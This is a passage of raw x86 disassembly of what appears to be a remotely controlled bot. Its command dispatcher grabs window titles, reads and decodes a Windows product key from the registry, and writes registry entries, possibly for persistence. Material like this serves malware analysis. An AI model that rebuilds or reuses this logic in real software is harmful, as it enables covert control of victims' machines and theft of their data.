mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_40A90C: ; CODE XREF: sub_40A8AD+33�j
; sub_40A8AD+56�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
jmp short loc_40A927
; ---------------------------------------------------------------------------
loc_40A920: ; CODE XREF: sub_40A8AD+116�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_40A927: ; CODE XREF: sub_40A8AD+71�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_28]
jge loc_40A9C8
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
push eax
call sub_416DE4 ; tolower
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 30h
jl short loc_40A95D
cmp [ebp+var_8], 39h
jg short loc_40A95D
mov eax, [ebp+var_8]
sub eax, 30h
mov [ebp+var_10], eax
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A8AD+9D�j
; sub_40A8AD+A3�j
cmp [ebp+var_8], 61h
jl short loc_40A99C
cmp [ebp+var_8], 66h
jg short loc_40A99C
and [ebp+var_24], 0
jmp short loc_40A976
; ---------------------------------------------------------------------------
loc_40A96F: ; CODE XREF: sub_40A8AD:loc_40A998�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_40A976: ; CODE XREF: sub_40A8AD+C0�j
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
test eax, eax
jz short loc_40A99A
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
cmp [ebp+var_8], eax
jnz short loc_40A998
mov eax, [ebp+var_24]
add eax, 0Ah
mov [ebp+var_10], eax
loc_40A998: ; CODE XREF: sub_40A8AD+E0�j
jmp short loc_40A96F
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A8AD+D3�j
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8AD+B4�j
; sub_40A8AD+BA�j
xor eax, eax
jmp short loc_40A9CB
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8AD+AE�j
; sub_40A8AD:loc_40A99A�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_14]
dec eax
push eax
push 10h
call sub_40A86D
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
imul eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp loc_40A920
; ---------------------------------------------------------------------------
loc_40A9C8: ; CODE XREF: sub_40A8AD+80�j
mov eax, [ebp+var_C]
loc_40A9CB: ; CODE XREF: sub_40A8AD+F1�j
pop edi
pop esi
leave
retn
sub_40A8AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CF proc near ; CODE XREF: sub_40D871+C95�p
; sub_40D871+D9C�p
var_6424 = dword ptr -6424h
var_6420 = dword ptr -6420h
var_641C = dword ptr -641Ch
var_6418 = dword ptr -6418h
var_6414 = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
var_6408 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63EC = dword ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = dword ptr -63D4h
var_63D0 = dword ptr -63D0h
var_63CC = dword ptr -63CCh
var_63C8 = dword ptr -63C8h
var_63C4 = dword ptr -63C4h
var_63C0 = dword ptr -63C0h
var_63BC = dword ptr -63BCh
var_63B8 = dword ptr -63B8h
var_63B4 = word ptr -63B4h
var_63B2 = word ptr -63B2h
var_63B0 = dword ptr -63B0h
var_63A4 = dword ptr -63A4h
var_63A0 = byte ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = byte ptr -6398h
var_6397 = byte ptr -6397h
var_6396 = byte ptr -6396h
var_6395 = byte ptr -6395h
var_6394 = byte ptr -6394h
var_6393 = byte ptr -6393h
var_6392 = byte ptr -6392h
var_6391 = byte ptr -6391h
var_6390 = byte ptr -6390h
var_638F = byte ptr -638Fh
var_638E = byte ptr -638Eh
var_638D = byte ptr -638Dh
var_638C = dword ptr -638Ch
var_6388 = byte ptr -6388h
var_5F84 = dword ptr -5F84h
var_5F80 = byte ptr -5F80h
var_5B7C = dword ptr -5B7Ch
var_5B78 = dword ptr -5B78h
var_5B74 = byte ptr -5B74h
var_5A70 = dword ptr -5A70h
var_5A6C = dword ptr -5A6Ch
var_5A68 = dword ptr -5A68h
var_5A64 = byte ptr -5A64h
var_1A64 = dword ptr -1A64h
var_1A60 = byte ptr -1A60h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_A38 = byte ptr -0A38h
var_A30 = dword ptr -0A30h
var_A2C = dword ptr -0A2Ch
var_A28 = dword ptr -0A28h
var_A24 = dword ptr -0A24h
var_A20 = dword ptr -0A20h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9F8 = dword ptr -9F8h
var_9F4 = byte ptr -9F4h
var_9EF = byte ptr -9EFh
var_9EA = byte ptr -9EAh
var_9E5 = byte ptr -9E5h
var_9E0 = byte ptr -9E0h
var_9DB = byte ptr -9DBh
var_9D8 = byte ptr -9D8h
var_9A4 = byte ptr -9A4h
var_970 = byte ptr -970h
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_8D3 = byte ptr -8D3h
var_8D2 = byte ptr -8D2h
var_8CD = byte ptr -8CDh
var_8CC = byte ptr -8CCh
var_8C7 = byte ptr -8C7h
var_8C6 = byte ptr -8C6h
var_8C1 = byte ptr -8C1h
var_8C0 = byte ptr -8C0h
var_8BB = byte ptr -8BBh
var_8B8 = byte ptr -8B8h
var_8A0 = byte ptr -8A0h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_59B = byte ptr -59Bh
var_598 = byte ptr -598h
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_1F0 = byte ptr -1F0h
var_1CC = byte ptr -1CCh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_183 = byte ptr -183h
var_83 = dword ptr -83h
var_7F = byte ptr -7Fh
var_19 = byte ptr -19h
var_B = byte ptr -0Bh
var_8 = byte ptr -8
var_5 = dword ptr -5
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 6424h
call sub_416BC0
push esi
push edi
mov eax, [ebp+arg_14]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_1A8], eax
push [ebp+arg_0]
lea eax, [ebp+var_1A4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_183]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+arg_C]
mov [ebp+var_83], eax
push 7Ah
push [ebp+arg_10]
lea eax, [ebp+var_7F]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov [ebp+var_5], 1
mov eax, [ebp+var_1A8]
sub eax, dword_419F18
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AA59
lea eax, [ebp+var_1A4]
push eax
call sub_415AF0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AA59: ; CODE XREF: sub_40A9CF+76�j
mov eax, [ebp+var_1A8]
sub eax, dword_419F0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AACF
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40AAAC
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_1F0]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AAAC: ; CODE XREF: sub_40A9CF+A6�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D7E5
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_40A9CF+9D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB21
push 200h
lea eax, [ebp+var_414]
push eax
call dword_4171D8 ; GetForegroundWindow
push eax
call dword_4171E4 ; GetWindowTextA
test eax, eax
jle short loc_40AB1C
lea eax, [ebp+var_414]
push eax
push offset dword_419EDC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AB1C: ; CODE XREF: sub_40A9CF+130�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9CF+113�j
mov eax, [ebp+var_1A8]
sub eax, dword_419ED0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB56
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4077DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB56: ; CODE XREF: sub_40A9CF+165�j
mov eax, [ebp+var_1A8]
sub eax, dword_419EC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AC89
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AC84
push 180h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_598]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 3
jle short loc_40ABFE
push offset dword_419EC0
mov eax, [ebp+var_418]
lea eax, [ebp+eax+var_59B]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40ABFE
mov eax, [ebp+var_418]
and [ebp+eax+var_59B], 0
lea eax, [ebp+var_598]
push eax
call sub_4078A0
pop ecx
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
loc_40ABFE: ; CODE XREF: sub_40A9CF+1E1�j
; sub_40A9CF+1FF�j
mov eax, [ebp+var_418]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_418]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AC1F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC1F: ; CODE XREF: sub_40A9CF+249�j
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF29
pop ecx
pop ecx
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF59
pop ecx
pop ecx
mov [ebp+var_418], eax
push [ebp+var_418]
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_598]
push eax
call sub_40EB4E
add esp, 0Ch
lea eax, [ebp+var_718]
push eax
push offset dword_419E9C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AC84: ; CODE XREF: sub_40A9CF+1A7�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40A9CF+19A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AD84
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_71C], eax
mov eax, [ebp+var_71C]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_71C]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AD0C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD0C: ; CODE XREF: sub_40A9CF+336�j
lea eax, [ebp+var_8A0]
push eax
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_720]
and [ebp+eax+var_8A0], 0
lea eax, [ebp+var_8A0]
push eax
push offset dword_419E70
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AD7F: ; CODE XREF: sub_40A9CF+2DA�j
; sub_40A9CF+2EC�j ...
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: sub_40A9CF+2CD�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E60
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADB2
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406643
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40A9CF+3C8�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADD9
lea eax, [ebp+var_1A4]
push eax
call sub_4064BF
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40A9CF+3F6�j
mov eax, [ebp+var_1A8]
sub eax, dword_419E48
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B0B6
and [ebp+var_9F8], 0
mov [ebp+var_A1C], 0C8h
push 0Ch
pop ecx
mov esi, offset dword_419E14
lea edi, [ebp+var_9D8]
rep movsd
movsb
push 5
pop ecx
mov esi, offset dword_419DFC
lea edi, [ebp+var_8B8]
rep movsd
movsb
lea eax, [ebp+var_9D8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_9F8]
push eax
push 20019h
push 0
lea eax, [ebp+var_9D8]
push eax
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_40AE7D
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AE78
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
loc_40AE78: ; CODE XREF: sub_40A9CF+49B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AE7D: ; CODE XREF: sub_40A9CF+485�j
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_8B8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_A1C]
push eax
lea eax, [ebp+var_9A4]
push eax
push 0
push 0
lea eax, [ebp+var_8B8]
push eax
push [ebp+var_9F8]
call dword_41700C ; RegQueryValueExA
test eax, eax
jz short loc_40AEE7
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AEE2
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
loc_40AEE2: ; CODE XREF: sub_40A9CF+505�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AEE7: ; CODE XREF: sub_40A9CF+4EF�j
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
push [ebp+var_9F8]
call dword_417028 ; RegCloseKey
push 7
pop ecx
mov esi, offset aALSsSCJEKi ; "¿«×ÄÄØé˜Ü¹œ™Ï—؆ÎÜ¥µ»ª›"
lea edi, [ebp+var_A18]
rep movsd
movsb
lea eax, [ebp+var_A18]
push eax
call sub_4105FB
pop ecx
and [ebp+var_9DB], 0
mov [ebp+var_8DC], 18h
jmp short loc_40AF3E
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40A9CF+60B�j
mov eax, [ebp+var_8DC]
dec eax
mov [ebp+var_8DC], eax
loc_40AF3E: ; CODE XREF: sub_40A9CF+560�j
cmp [ebp+var_8DC], 0
jl loc_40AFDF
and [ebp+var_A20], 0
mov [ebp+var_A24], 0Eh
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9CF+5EF�j
mov eax, [ebp+var_A24]
dec eax
mov [ebp+var_A24], eax
loc_40AF6B: ; CODE XREF: sub_40A9CF+58D�j
cmp [ebp+var_A24], 0
jl short loc_40AFC0
mov eax, [ebp+var_A20]
shl eax, 8
mov ecx, [ebp+var_A24]
movzx ecx, [ebp+ecx+var_970]
add eax, ecx
mov [ebp+var_A20], eax
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov ecx, [ebp+var_A24]
mov [ebp+ecx+var_970], al
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov [ebp+var_A20], edx
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AFC0: ; CODE XREF: sub_40A9CF+5A3�j
mov eax, [ebp+var_8DC]
mov ecx, [ebp+var_A20]
mov cl, [ebp+ecx+var_A18]
mov [ebp+eax+var_9F4], cl
jmp loc_40AF31
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: sub_40A9CF+576�j
lea eax, [ebp+var_A18]
push eax
call sub_4105AD
pop ecx
and [ebp+var_8BB], 0
mov [ebp+var_8C1], 2Dh
mov al, [ebp+var_8C1]
mov [ebp+var_8C7], al
mov al, [ebp+var_8C7]
mov [ebp+var_8CD], al
mov al, [ebp+var_8CD]
mov [ebp+var_8D3], al
push 5
lea eax, [ebp+var_9F4]
push eax
lea eax, [ebp+var_8D8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EF]
push eax
lea eax, [ebp+var_8D2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EA]
push eax
lea eax, [ebp+var_8CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E5]
push eax
lea eax, [ebp+var_8C6]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E0]
push eax
lea eax, [ebp+var_8C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8D8]
push eax
push offset dword_418B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B0B6: ; CODE XREF: sub_40A9CF+41D�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DCC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B11C
mov [ebp+var_8], 1
movsx eax, [ebp+var_19]
test eax, eax
jz short loc_40B0E6
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0E6: ; CODE XREF: sub_40A9CF+706�j
movsx eax, [ebp+var_B]
test eax, eax
jz short loc_40B0FD
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0FD: ; CODE XREF: sub_40A9CF+71D�j
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
loc_40B117: ; CODE XREF: sub_40A9CF+715�j
; sub_40A9CF+72C�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B11C: ; CODE XREF: sub_40A9CF+6FA�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DBC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B143
lea eax, [ebp+var_1A4]
push eax
call sub_414EB0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B143: ; CODE XREF: sub_40A9CF+760�j
mov eax, [ebp+var_1A8]
sub eax, dword_419DB0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B247
push 8
pop ecx
mov esi, offset dword_419D8C
lea edi, [ebp+var_A5C]
rep movsd
movsb
mov esi, offset dword_419D84
lea edi, [ebp+var_A38]
movsd
movsw
movsx eax, [ebp+var_A38]
mov ecx, off_41DA40
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_A30], eax
cmp [ebp+var_A30], 0
jz short loc_40B1AD
mov [ebp+var_63E4], offset dword_419D78
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1AD: ; CODE XREF: sub_40A9CF+7D0�j
mov [ebp+var_63E4], offset dword_419D68
loc_40B1B7: ; CODE XREF: sub_40A9CF+7DC�j
mov eax, [ebp+var_63E4]
mov [ebp+var_A28], eax
cmp [ebp+var_A30], 0
jz short loc_40B1D8
mov [ebp+var_63E8], offset aThisBuildIsFul ; "This build is fully functional"
jmp short loc_40B1E2
; ---------------------------------------------------------------------------
loc_40B1D8: ; CODE XREF: sub_40A9CF+7FB�j
mov [ebp+var_63E8], offset aThisBuildIsBro ; "This build is broken and will not funct"...
loc_40B1E2: ; CODE XREF: sub_40A9CF+807�j
mov eax, [ebp+var_63E8]
mov [ebp+var_A2C], eax
lea eax, [ebp+var_A5C]
push eax
call sub_4105FB
pop ecx
push [ebp+var_A2C]
push [ebp+var_A28]
mov eax, dword_41EC00
and eax, 0FFFFh
push eax
movsx eax, byte ptr dword_41DA20
and eax, 0FFh
push eax
lea eax, [ebp+var_A5C]
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
lea eax, [ebp+var_A5C]
push eax
call sub_4105AD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B247: ; CODE XREF: sub_40A9CF+787�j
mov eax, [ebp+var_1A8]
sub eax, dword_419D08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B28E
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_405E45
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B28E: ; CODE XREF: sub_40A9CF+88B�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B2C5
mov eax, [ebp+arg_18]
add eax, 4
push eax
mov eax, [ebp+arg_14]
add eax, 4
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_4167DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B2C5: ; CODE XREF: sub_40A9CF+8D2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CF0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B2EF
mov eax, [ebp+var_1A8]
sub eax, dword_419CE4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B300
loc_40B2EF: ; CODE XREF: sub_40A9CF+909�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D74D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40A9CF+91E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CD4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B335
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403260
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B335: ; CODE XREF: sub_40A9CF+944�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CC8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B36A
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40260D
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B36A: ; CODE XREF: sub_40A9CF+979�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3A5
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406509
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3A5: ; CODE XREF: sub_40A9CF+9AE�j
mov eax, [ebp+var_1A8]
sub eax, dword_419CA8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3DA
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_41665C
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3DA: ; CODE XREF: sub_40A9CF+9E9�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C98
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B426
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B3FD
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_40A9CF+A27�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000002h
call sub_401000
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B426: ; CODE XREF: sub_40A9CF+A1E�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B44C
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_401146
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B44C: ; CODE XREF: sub_40A9CF+A6A�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B47D
push 0
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B47D: ; CODE XREF: sub_40A9CF+A90�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C70
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4AE
push 1
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4017AA
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4AE: ; CODE XREF: sub_40A9CF+AC1�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C64
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B4D5
lea eax, [ebp+var_1A4]
push eax
call sub_409BF1
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B4D5: ; CODE XREF: sub_40A9CF+AF2�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C5C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B508
push offset dword_41EF18
push offset dword_419C4C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_40A9CF+B19�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C40
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B536
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413FE7
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_40A9CF+B4C�j
mov eax, [ebp+var_1A8]
sub eax, dword_419C34
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C28
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B575
mov eax, [ebp+var_1A8]
sub eax, dword_419C1C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B5A7
loc_40B575: ; CODE XREF: sub_40A9CF+B7A�j
; sub_40A9CF+B8F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_413AB0
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
